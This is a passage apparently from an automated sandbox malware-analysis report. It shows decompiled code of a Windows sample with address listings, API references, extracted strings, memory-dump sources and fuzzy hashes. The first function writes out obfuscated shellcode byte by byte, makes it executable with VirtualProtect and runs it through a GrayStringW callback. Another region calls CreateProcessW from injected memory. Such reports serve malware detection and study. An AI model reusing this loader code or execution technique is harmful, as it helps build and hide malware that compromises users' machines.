				_v244 = 0x68;
				_v243 = 0;
				_v242 = 0x30;
				_v241 = 0;
				_v240 = 0;
				_v239 = 0x50;
				_v238 = 0x53;
				_v237 = 0x2b;
				_v236 = 0xf8;
				_v235 = 0xff;
				_v234 = 0x55;
				_v233 = 0xf8;
				_v232 = 3;
				_v231 = 0x75;
				_v230 = 0xfc;
				_v229 = 0x68;
				_v228 = 0x7e;
				_v227 = 0x13;
				_v226 = 0;
				_v225 = 0;
				_v224 = 0x56;
				_v223 = 0x50;
				_v222 = 0x89;
				_v221 = 0x45;
				_v220 = 0xf0;
				_v219 = 0xe8;
				_v218 = 0x97;
				_v217 = 0;
				_v216 = 0;
				_v215 = 0;
				_v214 = 0x83;
				_v213 = 0xc4;
				_v212 = 0xc;
				_v211 = 0x6a;
				_v210 = 0x40;
				_v209 = 0x68;
				_v208 = 0;
				_v207 = 0x30;
				_v206 = 0;
				_v205 = 0;
				_v204 = 0x57;
				_v203 = 0x53;
				_v202 = 0xff;
				_v201 = 0x55;
				_v200 = 0xf8;
				_v199 = 0x57;
				_v198 = 0x8d;
				_v197 = 0x8e;
				_v196 = 0x7e;
				_v195 = 0x13;
				_v194 = 0;
				_v193 = 0;
				_v192 = 0x89;
				_v191 = 0x45;
				_v190 = 0xf4;
				_v189 = 0x51;
				_v188 = 0x50;
				_v187 = 0xe8;
				_v186 = 0x77;
				_v185 = 0;
				_v184 = 0;
				_v183 = 0;
				_v182 = 0x8b;
				_v181 = 0x75;
				_v180 = 0xf0;
				_v179 = 0x83;
				_v178 = 0xc4;
				_v177 = 0xc;
				_v176 = 0x8a;
				_v175 = 4;
				_v174 = 0x33;
				_v173 = 0xb1;
				_v172 = 0x7d;
				_v171 = 0x34;
				_v170 = 0xf4;
				_v169 = 0x8a;
				_v168 = 0xd3;
				_v167 = 0xc0;
				_v166 = 0xc8;
				_v165 = 2;
				_v164 = 0x2a;
				_v163 = 0xc3;
				_v162 = 0x32;
				_v161 = 0xc3;
				_v160 = 0x2a;
				_v159 = 0xc8;
				_v158 = 0xb0;
				_v157 = 1;
				_v156 = 0x32;
				_v155 = 0xcb;
				_v154 = 0x2a;
				_v153 = 0xc3;
				_v152 = 0xc0;
				_v151 = 0xc1;
				_v150 = 2;
				_v149 = 0xf6;
				_v148 = 0xd9;
				_v147 = 0x32;
				_v146 = 0xcb;
				_v145 = 0x80;
				_v144 = 0xe9;
				_v143 = 0x60;
				_v142 = 0x32;
				_v141 = 0xcb;
				_v140 = 0xc0;
				_v139 = 0xc1;
				_v138 = 2;
				_v137 = 0x2a;
				_v136 = 0xd1;
				_v135 = 0x80;
				_v134 = 0xf2;
				_v133 = 0xfa;
				_v132 = 0x2a;
				_v131 = 0xd3;
				_v130 = 0xf6;
				_v129 = 0xd2;
				_v128 = 0xc0;
				_v127 = 0xc2;
				_v126 = 3;
				_v125 = 2;
				_v124 = 0xd0;
				_v123 = 0xb0;
				_v122 = 0xfa;
				_v121 = 0xc0;
				_v120 = 0xc2;
				_v119 = 3;
				_v118 = 0x32;
				_v117 = 0xd3;
				_v116 = 0xf6;
				_v115 = 0xda;
				_v114 = 0x80;
				_v113 = 0xf2;
				_v112 = 0x51;
				_v111 = 0x2a;
				_v110 = 0xc2;
				_v109 = 0x2a;
				_v108 = 0xc3;
				_v107 = 0x34;
				_v106 = 0xe4;
				_v105 = 0x2a;
				_v104 = 0xc3;
				_v103 = 0x34;
				_v102 = 0x8b;
				_v101 = 4;
				_v100 = 0x60;
				_v99 = 0x34;
				_v98 = 0xa5;
				_v97 = 2;
				_v96 = 0xc3;
				_v95 = 0xc0;
				_v94 = 0xc0;
				_v93 = 2;
				_v92 = 2;
				_v91 = 0xc3;
				_v90 = 0xf6;
				_v89 = 0xd8;
				_v88 = 0x88;
				_v87 = 4;
				_v86 = 0x33;
				_v85 = 0x43;
				_v84 = 0x81;
				_v83 = 0xfb;
				_v82 = 0x7e;
				_v81 = 0x13;
				_v80 = 0;
				_v79 = 0;
				_v78 = 0x72;
				_v77 = 0x9c;
				_v76 = 0xff;
				_v75 = 0x75;
				_v74 = 0xf4;
				_v73 = 0xff;
				_v72 = 0xd6;
				_v71 = 0x59;
				_v70 = 0x5f;
				_v69 = 0x5e;
				_v68 = 0x5b;
				_v67 = 0x8b;
				_v66 = 0xe5;
				_v65 = 0x5d;
				_v64 = 0xc3;
				_v63 = 0x55;
				_v62 = 0x8b;
				_v61 = 0xec;
				_v60 = 0x8b;
				_v59 = 0x55;
				_v58 = 0x10;
				_v57 = 0x85;
				_v56 = 0xd2;
				_v55 = 0x74;
				_v54 = 0x15;
				_v53 = 0x8b;
				_v52 = 0x4d;
				_v51 = 8;
				_v50 = 0x56;
				_v49 = 0x8b;
				_v48 = 0x75;
				_v47 = 0xc;
				_v46 = 0x2b;
				_v45 = 0xf1;
				_v44 = 0x8a;
				_v43 = 4;
				_v42 = 0xe;
				_v41 = 0x88;
				_v40 = 1;
				_v39 = 0x41;
				_v38 = 0x83;
				_v37 = 0xea;
				_v36 = 1;
				_v35 = 0x75;
				_v34 = 0xf5;
				_v33 = 0x5e;
				_v32 = 0x5d;
				_v31 = 0xc3;
				_v30 = 0;
				_v29 = 0;
				_v28 = 0;
				_v27 = 0;
				_v20 = 0;
				VirtualProtect( &_v676, 0x28a, 0x40,  &_v696); // executed
				GrayStringW(GetDC(0), 0,  &_v676,  &_v1712, 0, 0, 0, 0, 0); // executed
				_v16 = CommandLineToArgvW(GetCommandLineW(),  &_v688);
				if(_v16 != 0) {
					_v8 = 1;
					while(_v8 < _v688) {
						if(( *( *(_v16 + _v8 * 4)) & 0x0000ffff) == 0x2f || ( *( *(_v16 + _v8 * 4)) & 0x0000ffff) == 0x2d) {
							_t745 = E004015F0( *(_v16 + _v8 * 4));
							_t784 = _t784 + 4;
							if(_t745 != 0) {
								_v8 = _v8 + 1;
								continue;
							}
							return 1;
						} else {
							_v20 =  *((intOrPtr*)(_v16 + _v8 * 4));
							break;
						}
					}
					if(_v20 != 0) {
						_v680 = GetFullPathNameW(_v20, 0x200, 0x416440,  &_v692);
						if(_v680 == 0 || _v680 > 0xa) {
							return 1;
						} else {
							_v684 = E00403405(_v692, 0x2e);
							if(_v684 == 0 || E004011C0(_v684,  &_v712) == 0) {
								return 1;
							} else {
								__imp__CoInitialize(0);
								if(E00401120( &_v712,  &_v12,  &_v24) != 0) {
									if(E004013B0(_v12, _v24) != 0) {
										E00401580(_v20, _v12, _v24);
										 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x1c))))(_v12);
										_t775 =  *0x416648; // 0x0
										_t739 =  *0x416648; // 0x0
										 *((intOrPtr*)( *((intOrPtr*)( *_t739 + 8))))(_t775);
									}
									 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
									 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
									__imp__CoUninitialize();
									return 0;
								}
								__imp__CoUninitialize();
								return 1;
							}
						}
					}
					return 1;
				}
				return 1;
			}

0x00401639
0x00401640
0x00401647
0x0040164e
0x00401655
0x0040165c
0x00401663
0x0040166a
0x00401671
0x00401678
0x0040167f
0x00401686
0x0040168d
0x00401694
0x0040169b
0x004016a2
0x004016a9
0x004016b0
0x004016b7
0x004016be
0x004016c5
0x004016cc
0x004016d3
0x004016da
0x004016e1
0x004016e8
0x004016ef
0x004016f6
0x004016fd
0x00401704
0x0040170b
0x00401712
0x00401719
0x00401720
0x00401727
0x0040172e
0x00401735
0x0040173c
0x00401743
0x0040174a
0x00401751
0x00401758
0x0040175f
0x00401766
0x0040176d
0x00401774
0x0040177b
0x00401782
0x00401789
0x00401790
0x00401797
0x0040179e
0x004017a5
0x004017ac
0x004017b3
0x004017ba
0x004017c1
0x004017c8
0x004017cf
0x004017d6
0x004017dd
0x004017e4
0x004017eb
0x004017f2
0x004017f9
0x00401800
0x00401807
0x0040180e
0x00401815
0x0040181c
0x00401823
0x0040182a
0x00401831
0x00401838
0x0040183f
0x00401846
0x0040184d
0x00401854
0x0040185b
0x00401862
0x00401869
0x00401870
0x00401877
0x0040187e
0x00401885
0x0040188c
0x00401893
0x0040189a
0x004018a1
0x004018a8
0x004018af
0x004018b6
0x004018bd
0x004018c4
0x004018cb
0x004018d2
0x004018d9
0x004018e0
0x004018e7
0x004018ee
0x004018f5
0x004018fc
0x00401903
0x0040190a
0x00401911
0x00401918
0x0040191f
0x00401926
0x0040192d
0x00401934
0x0040193b
0x00401942
0x00401949
0x00401950
0x00401957
0x0040195e
0x00401965
0x0040196c
0x00401973
0x0040197a
0x00401981
0x00401988
0x0040198f
0x00401996
0x0040199d
0x004019a4
0x004019ab
0x004019b2
0x004019b9
0x004019c0
0x004019c7
0x004019ce
0x004019d5
0x004019dc
0x004019e3
0x004019ea
0x004019f1
0x004019f8
0x004019ff
0x00401a06
0x00401a0d
0x00401a14
0x00401a1b
0x00401a22
0x00401a29
0x00401a30
0x00401a37
0x00401a3e
0x00401a45
0x00401a4c
0x00401a53
0x00401a5a
0x00401a61
0x00401a68
0x00401a6f
0x00401a76
0x00401a7d
0x00401a84
0x00401a8b
0x00401a92
0x00401a99
0x00401aa0
0x00401aa7
0x00401aae
0x00401ab5
0x00401abc
0x00401ac3
0x00401aca
0x00401ad1
0x00401ad8
0x00401adf
0x00401ae6
0x00401aed
0x00401af4
0x00401afb
0x00401b02
0x00401b09
0x00401b10
0x00401b17
0x00401b1e
0x00401b25
0x00401b2c
0x00401b33
0x00401b3a
0x00401b41
0x00401b48
0x00401b4f
0x00401b56
0x00401b5d
0x00401b64
0x00401b6b
0x00401b72
0x00401b79
0x00401b80
0x00401b87
0x00401b8e
0x00401b95
0x00401b9c
0x00401ba3
0x00401baa
0x00401bb1
0x00401bb8
0x00401bbf
0x00401bc6
0x00401bcd
0x00401bd4
0x00401bdb
0x00401be2
0x00401be9
0x00401bf0
0x00401bf7
0x00401bfe
0x00401c05
0x00401c0c
0x00401c13
0x00401c1a
0x00401c21
0x00401c28
0x00401c2f
0x00401c36
0x00401c3d
0x00401c44
0x00401c4b
0x00401c52
0x00401c59
0x00401c60
0x00401c67
0x00401c6e
0x00401c75
0x00401c7c
0x00401c83
0x00401c8a
0x00401c91
0x00401c98
0x00401c9f
0x00401ca6
0x00401cad
0x00401cb4
0x00401cbb
0x00401cc2
0x00401cc9
0x00401cd0
0x00401cd7
0x00401cde
0x00401ce5
0x00401cec
0x00401cf3
0x00401cfa
0x00401d01
0x00401d08
0x00401d0f
0x00401d16
0x00401d1d
0x00401d24
0x00401d2b
0x00401d32
0x00401d39
0x00401d40
0x00401d47
0x00401d4e
0x00401d55
0x00401d5c
0x00401d63
0x00401d6a
0x00401d71
0x00401d78
0x00401d7f
0x00401d86
0x00401d8d
0x00401d94
0x00401d9b
0x00401da2
0x00401da9
0x00401db0
0x00401db7
0x00401dbe
0x00401dc5
0x00401dcc
0x00401dd3
0x00401dda
0x00401de1
0x00401de8
0x00401def
0x00401df6
0x00401dfd
0x00401e04
0x00401e0b
0x00401e12
0x00401e19
0x00401e20
0x00401e27
0x00401e2e
0x00401e35
0x00401e3c
0x00401e43
0x00401e4a
0x00401e51
0x00401e58
0x00401e5f
0x00401e66
0x00401e6d
0x00401e74
0x00401e7b
0x00401e82
0x00401e89
0x00401e90
0x00401e97
0x00401e9e
0x00401ea5
0x00401eac
0x00401eb3
0x00401eba
0x00401ec1
0x00401ec8
0x00401ecf
0x00401ed6
0x00401edd
0x00401ee4
0x00401eeb
0x00401ef2
0x00401ef9
0x00401f00
0x00401f07
0x00401f0e
0x00401f15
0x00401f1c
0x00401f23
0x00401f2a
0x00401f31
0x00401f38
0x00401f3f
0x00401f46
0x00401f4d
0x00401f54
0x00401f5b
0x00401f62
0x00401f69
0x00401f70
0x00401f77
0x00401f7e
0x00401f85
0x00401f8c
0x00401f93
0x00401f9a
0x00401fa1
0x00401fa8
0x00401faf
0x00401fb6
0x00401fbd
0x00401fc4
0x00401fcb
0x00401fd2
0x00401fd9
0x00401fe0
0x00401fe7
0x00401fee
0x00401ff5
0x00401ffc
0x00402003
0x0040200a
0x00402011
0x00402018
0x0040201f
0x00402026
0x0040202d
0x00402034
0x0040203b
0x00402042
0x00402049
0x00402050
0x00402057
0x0040205e
0x00402065
0x0040206c
0x00402073
0x0040207a
0x00402081
0x00402088
0x0040208f
0x00402096
0x0040209d
0x004020a4
0x004020ab
0x004020b2
0x004020b9
0x004020c0
0x004020c7
0x004020ce
0x004020d5
0x004020dc
0x004020e3
0x004020ea
0x004020f1
0x004020f8
0x004020ff
0x00402106
0x0040210d
0x00402114
0x0040211b
0x00402122
0x00402129
0x00402130
0x00402137
0x0040213e
0x00402145
0x0040214c
0x00402153
0x0040215a
0x00402161
0x00402168
0x0040216f
0x00402176
0x0040217d
0x00402184
0x0040218b
0x00402192
0x00402199
0x004021a0
0x004021a7
0x004021ae
0x004021b5
0x004021bc
0x004021c3
0x004021ca
0x004021d1
0x004021d8
0x004021df
0x004021e6
0x004021ed
0x004021f4
0x004021fb
0x00402202
0x00402209
0x00402210
0x00402217
0x0040221e
0x00402225
0x0040222c
0x00402233
0x0040223a
0x00402241
0x00402248
0x0040224f
0x00402256
0x0040225d
0x00402264
0x0040226b
0x00402272
0x00402279
0x00402280
0x00402287
0x0040228e
0x00402295
0x0040229c
0x004022a3
0x004022aa
0x004022b1
0x004022b8
0x004022bf
0x004022c6
0x004022cd
0x004022d4
0x004022db
0x004022e2
0x004022e9
0x004022f0
0x004022f7
0x004022fe
0x00402305
0x0040230c
0x00402313
0x0040231a
0x00402321
0x00402328
0x0040232f
0x00402336
0x0040233d
0x00402344
0x0040234b
0x00402352
0x00402359
0x00402360
0x00402367
0x0040236e
0x00402375
0x0040237c
0x00402383
0x0040238a
0x00402391
0x00402398
0x0040239f
0x004023a6
0x004023ad
0x004023b4
0x004023bb
0x004023c2
0x004023c9
0x004023d0
0x004023d7
0x004023de
0x004023e5
0x004023ec
0x004023f3
0x004023fa
0x00402401
0x00402408
0x0040240f
0x00402416
0x0040241d
0x00402424
0x0040242b
0x00402432
0x00402439
0x00402440
0x00402447
0x0040244e
0x00402455
0x0040245c
0x00402463
0x0040246a
0x00402471
0x00402478
0x0040247f
0x00402486
0x0040248d
0x00402494
0x0040249b
0x004024a2
0x004024a9
0x004024b0
0x004024b7
0x004024be
0x004024c5
0x004024cc
0x004024d3
0x004024da
0x004024e1
0x004024e8
0x004024ef
0x004024f6
0x004024fd
0x00402504
0x0040250b
0x00402512
0x00402519
0x0040251d
0x00402521
0x00402525
0x00402529
0x0040252d
0x00402531
0x00402535
0x00402539
0x0040253d
0x00402541
0x00402545
0x00402549
0x0040254d
0x00402551
0x00402555
0x00402559
0x0040255d
0x00402561
0x00402565
0x00402569
0x0040256d
0x00402571
0x00402575
0x00402579
0x0040257d
0x00402581
0x00402585
0x00402589
0x0040258d
0x00402591
0x00402595
0x00402599
0x0040259d
0x004025a1
0x004025a5
0x004025a9
0x004025ad
0x004025b1
0x004025b5
0x004025b9
0x004025bd
0x004025c1
0x004025c5
0x004025c9
0x004025cd
0x004025d1
0x004025d5
0x004025d9
0x004025dd
0x004025e1
0x004025e5
0x004025e9
0x004025ed
0x004025f1
0x004025f5
0x004025f9
0x004025fd
0x00402601
0x00402605
0x00402609
0x0040260d
0x00402611
0x00402615
0x00402619
0x0040261d
0x00402621
0x00402625
0x00402629
0x0040262d
0x00402631
0x00402635
0x00402639
0x0040263d
0x00402641
0x00402645
0x00402649
0x0040264d
0x00402651
0x00402655
0x00402659
0x0040265d
0x00402661
0x00402665
0x00402669
0x0040266d
0x00402671
0x00402675
0x00402679
0x0040267d
0x00402681
0x00402685
0x00402689
0x0040268d
0x00402691
0x00402695
0x00402699
0x0040269d
0x004026a1
0x004026a5
0x004026a9
0x004026ad
0x004026b1
0x004026b5
0x004026b9
0x004026bd
0x004026c1
0x004026dd
0x00402706
0x00402720
0x00402727
0x00402733
0x00402745
0x0040275f
0x0040277c
0x00402781
0x00402786
0x00402742
0x00000000
0x00402742
0x00000000
0x00402794
0x0040279d
0x00000000
0x0040279d
0x0040275f
0x004027a8
0x004027cf
0x004027dc
0x00000000
0x004027f1
0x00402802
0x0040280f
0x00000000
0x00402835
0x00402837
0x00402856
0x00402877
0x00402885
0x00402899
0x0040289b
0x004028a2
0x004028ac
0x004028ac
0x004028ba
0x004028c8
0x004028ca
0x00000000
0x004028d0
0x00402858
0x00000000
0x0040285e
0x0040280f
0x004027dc
0x00000000
0x004027aa
0x00000000

APIs

VirtualProtect.KERNELBASE(000000E9,0000028A,00000040,?), ref: 004026DD
GetDC.USER32(00000000), ref: 004026FF
GrayStringW.USER32(00000000), ref: 00402706
GetCommandLineW.KERNEL32(?), ref: 00402713
CommandLineToArgvW.SHELL32(00000000), ref: 0040271A

Strings

, xrefs: 0040182A
~, xrefs: 004021DF
], xrefs: 004019DC
Q, xrefs: 00402569
*, xrefs: 00402519
_, xrefs: 00401766
G, xrefs: 004017E4
W, xrefs: 00401C1A
S, xrefs: 004017A5
x, xrefs: 00401807
D, xrefs: 00401DD3
F, xrefs: 00401981
3, xrefs: 004025D1
V, xrefs: 00401BC6
u, xrefs: 0040198F
E, xrefs: 00401C2F
2, xrefs: 004024B0
4, xrefs: 0040258D
~, xrefs: 00402359
8, xrefs: 00401800
@, xrefs: 00401AD1
@, xrefs: 00401CA6
j, xrefs: 004022F0
P, xrefs: 0040229C
h, xrefs: 00402209
W, xrefs: 00401A99
h, xrefs: 00401F77
[, xrefs: 004019C7
E, xrefs: 004019F1
S, xrefs: 00402233
+, xrefs: 004021FB
Y, xrefs: 00401942
Y, xrefs: 0040260D
P, xrefs: 0040201F
\, xrefs: 00401BE2
(, xrefs: 0040218B
V, xrefs: 00402661
U, xrefs: 00401FAF
2, xrefs: 00401D08
S, xrefs: 00401E27
y, xrefs: 00401CD7
u, xrefs: 004021A7
u, xrefs: 0040167F
], xrefs: 004026A9
d, xrefs: 00401AA0
h, xrefs: 00401BA3
E, xrefs: 00402011
a, xrefs: 00401CDE
U, xrefs: 00401973
r, xrefs: 004025F1
u, xrefs: 0040203B
2, xrefs: 00402471
V, xrefs: 00401671
M, xrefs: 00402659
W, xrefs: 00402321
@, xrefs: 00401B17
t, xrefs: 004018E7
^, xrefs: 0040176D
], xrefs: 00402625
3, xrefs: 004019AB
2, xrefs: 00402447
@, xrefs: 00401AE6
_, xrefs: 004019B9
Q, xrefs: 00401797
4, xrefs: 0040257D
0, xrefs: 00401CC9
j, xrefs: 00401E19
T, xrefs: 004020E3
t, xrefs: 0040195E
0, xrefs: 00401AAE
C, xrefs: 004025D5
k, xrefs: 00401B56
0, xrefs: 00401F85
V, xrefs: 004017AC
S, xrefs: 00401DEF
U, xrefs: 00402336
2, xrefs: 004024D3
h, xrefs: 004022FE
7, xrefs: 00401694
*, xrefs: 0040247F
W, xrefs: 00401F9A
A, xrefs: 0040268D
_, xrefs: 00402611
[, xrefs: 00402619
4, xrefs: 0040259D
P, xrefs: 00402129
@, xrefs: 0040187E
$, xrefs: 00401A6F
p, xrefs: 00401A14
W, xrefs: 00402344
^, xrefs: 004019C0
*, xrefs: 004024F6
V, xrefs: 00401B64
<, xrefs: 004020A4
*, xrefs: 00402455
j, xrefs: 00401E2E
3, xrefs: 004023F3
`, xrefs: 004024CC
t, xrefs: 0040264D
E, xrefs: 00401950
(, xrefs: 00401D32
], xrefs: 00401B72
P, xrefs: 00402391
$, xrefs: 00401862
U, xrefs: 0040165C
W, xrefs: 00402026
j, xrefs: 004021CA
U, xrefs: 0040263D
j, xrefs: 00401F69
S, xrefs: 00401A8B
h, xrefs: 00402272
S, xrefs: 00402003
u, xrefs: 0040269D
t, xrefs: 0040210D
*, xrefs: 00402439
V, xrefs: 00401CE5
0, xrefs: 00402217
r, xrefs: 0040199D
D, xrefs: 004017F9
@, xrefs: 00402184
P, xrefs: 004020DC
U, xrefs: 0040224F
V, xrefs: 0040202D
S, xrefs: 00401DA2
W, xrefs: 004016B0
U, xrefs: 00401F0E
V, xrefs: 00402295
U, xrefs: 00401A4C
X, xrefs: 00401838
E, xrefs: 004018CB
#, xrefs: 00401BB1
(, xrefs: 00402145
^, xrefs: 004026A5
E, xrefs: 00401CF3
F, xrefs: 0040209D
3, xrefs: 00401B33
+, xrefs: 00402671
M, xrefs: 004018B6
u, xrefs: 004025FD
P, xrefs: 00401D9B
~, xrefs: 004025E1
W, xrefs: 004017B3
P, xrefs: 00401823
E, xrefs: 0040237C
V, xrefs: 00401C21
h, xrefs: 00401C60
U, xrefs: 004020F1
S, xrefs: 00401EF9
U, xrefs: 004018A1
E, xrefs: 00401EAC
`, xrefs: 00402599
S, xrefs: 00402328
V, xrefs: 00401A92
u, xrefs: 00402264
h, xrefs: 00401BFE
<, xrefs: 004017EB
h, xrefs: 00401E3C
E, xrefs: 00401C91
h, xrefs: 00401DF6
u, xrefs: 00401758
*, xrefs: 00402585
N, xrefs: 00401C44
h, xrefs: 00401CC2
U, xrefs: 00401E97
0, xrefs: 0040230C
@, xrefs: 004021D1
Q, xrefs: 0040238A
+, xrefs: 0040223A
w, xrefs: 0040239F
P, xrefs: 00401F00
U, xrefs: 004021BC
P, xrefs: 00401918
], xrefs: 00401774
2, xrefs: 00402551
u, xrefs: 00402669
S, xrefs: 00401FA1
Q, xrefs: 0040179E
E, xrefs: 00401D40
h, xrefs: 00401B41
H, xrefs: 004020C7
*, xrefs: 0040256D
;, xrefs: 00401949
H, xrefs: 0040185B
>, xrefs: 00401735
U, xrefs: 00401782
F, xrefs: 004016F6
U, xrefs: 00402050
U, xrefs: 00402161
*, xrefs: 00402575
P, xrefs: 0040222C
U, xrefs: 0040262D
r, xrefs: 00401BBF
~, xrefs: 00402279
^, xrefs: 00402615
V, xrefs: 00401C83
;, xrefs: 00401988
E, xrefs: 004022AA
}, xrefs: 00402401
i, xrefs: 00401B87
}, xrefs: 004017C1
4, xrefs: 00402408
-, xrefs: 00401C75
3, xrefs: 004017CF
P, xrefs: 00401E89
u, xrefs: 004023C2
@, xrefs: 004022F7
h, xrefs: 00401D78

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CommandLine$ArgvGrayProtectStringVirtual
String ID: $#$$$$$($($($*$*$*$*$*$*$*$*$+$+$+$-$0$0$0$0$0$2$2$2$2$2$2$3$3$3$3$3$4$4$4$4$7$8$;$;$<$<$>$@$@$@$@$@$@$@$@$A$C$D$D$E$E$E$E$E$E$E$E$E$E$E$F$F$F$G$H$H$M$M$N$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$S$S$S$S$S$S$S$S$S$S$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$X$Y$Y$[$[$\$]$]$]$]$]$^$^$^$^$_$_$_$`$`$a$d$h$h$h$h$h$h$h$h$h$h$h$h$i$j$j$j$j$j$k$p$r$r$r$t$t$t$t$u$u$u$u$u$u$u$u$u$u$w$x$y$}$}$~$~$~$~
API String ID: 3628731030-2268195919
Opcode ID: 8e0241acf7a294384d3ce4bb1549e457520cc34aa517cd04f55dd8590b393dbd
Instruction ID: 31b66af868a262d95fba05b89562bc200a0a12a7ff42e8732463a86f9bc14e1e
Opcode Fuzzy Hash: 8e0241acf7a294384d3ce4bb1549e457520cc34aa517cd04f55dd8590b393dbd
Instruction Fuzzy Hash: FDC2682090CBE9C9DB32C67C8C5C7CDAE611B27325F5843D9D1E82A2D2C7B50B85DB66

Uniqueness

Uniqueness Score: -1.00%

Function 021F0E44, Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 428processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 021F1022

Strings

D, xrefs: 021F0E7B

Memory Dump Source

Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: 4a41d18c70f7584a492693245e1824a39ef32eea3cfcf2ef9dfb78456a71ee65
Instruction ID: 6a1580cb2306a3c3c640e28e70349a45e4c8ae4f41e52ddf483843e888253f36
Opcode Fuzzy Hash: 4a41d18c70f7584a492693245e1824a39ef32eea3cfcf2ef9dfb78456a71ee65
Instruction Fuzzy Hash: AD02F370E40219EFDF94DF94C985BADBBB5BF08305F244059E629EB295D770AA81CF10

Uniqueness

Uniqueness Score: -1.00%

Function 004080ED, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004080ED() {
				void* _t3;
				void* _t16;
				WCHAR* _t17;

				_t17 = GetEnvironmentStringsW();
				if(_t17 != 0) {
					_t11 = E004080B6(_t17) - _t17 & 0xfffffffe;
					_t3 = E004067AF(E004080B6(_t17) - _t17 & 0xfffffffe); // executed
					_t16 = _t3;
					if(_t16 != 0) {
						E0040DE00(_t16, _t17, _t11);
					}
					E00406775(0);
					FreeEnvironmentStringsW(_t17);
				} else {
					_t16 = 0;
				}
				return _t16;
			}

0x004080f7
0x004080fb
0x0040810c
0x00408110
0x00408115
0x0040811b
0x00408120
0x00408125
0x0040812a
0x00408131
0x004080fd
0x004080fd
0x004080fd
0x0040813c

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004080F1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00408131

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 35b664fad9df685f0dbcbf31e3ebc8cc5d6ebd4fc4bcbce79b762b4b6627fa65
Instruction ID: a59313a91162718aea012b73c5a2a787e2eb3159f4801818b104ec43d02cfe25
Opcode Fuzzy Hash: 35b664fad9df685f0dbcbf31e3ebc8cc5d6ebd4fc4bcbce79b762b4b6627fa65
Instruction Fuzzy Hash: 81E0E53720492026D2212336BE8A96B1959CFD1779726013EF0557A2C2EE3D4C0700F9

Uniqueness

Uniqueness Score: -1.00%

Function 021F0AB5, Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000,00034988,00034988,00034988), ref: 021F0BA8

Memory Dump Source

Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e90ae6141465c8cd53c470e3aa9b2636298d93ba400dd60d3e5031b1c6a249cc
Instruction ID: 82c4cf6ba9851e85c7ad49c7c41175780b823d543af17228f0ee3ed736cc51fc
Opcode Fuzzy Hash: e90ae6141465c8cd53c470e3aa9b2636298d93ba400dd60d3e5031b1c6a249cc
Instruction Fuzzy Hash: 5631E319A94348A9DB90DBE8F851BBDB7B2AF48B10F205407E908EE2E0E3710D90D759

Uniqueness

Uniqueness Score: -1.00%

Function 00406841, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406841(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x4163f0, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00406206();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00407254(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E004093BC(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00406847
0x0040684c
0x0040685a
0x0040685a
0x00406860
0x00406862
0x00406862
0x00406879
0x00406882
0x0040688a
0x00000000
0x00000000
0x0040686a
0x0040686c
0x0040688e
0x00406893
0x00406899
0x00000000
0x00406899
0x00406875
0x00406877
0x00000000
0x00000000
0x00406877
0x00000000
0x00406879
0x00406852
0x00406858
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00406E01,00000001,00000364,00000006,000000FF,?,00407259,0040A127,?,0040995E,?,00000000), ref: 00406882

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 15ac06341d1869c5be9bff9d4644510d53000bf7317bbfad6e4d18ac7378520f
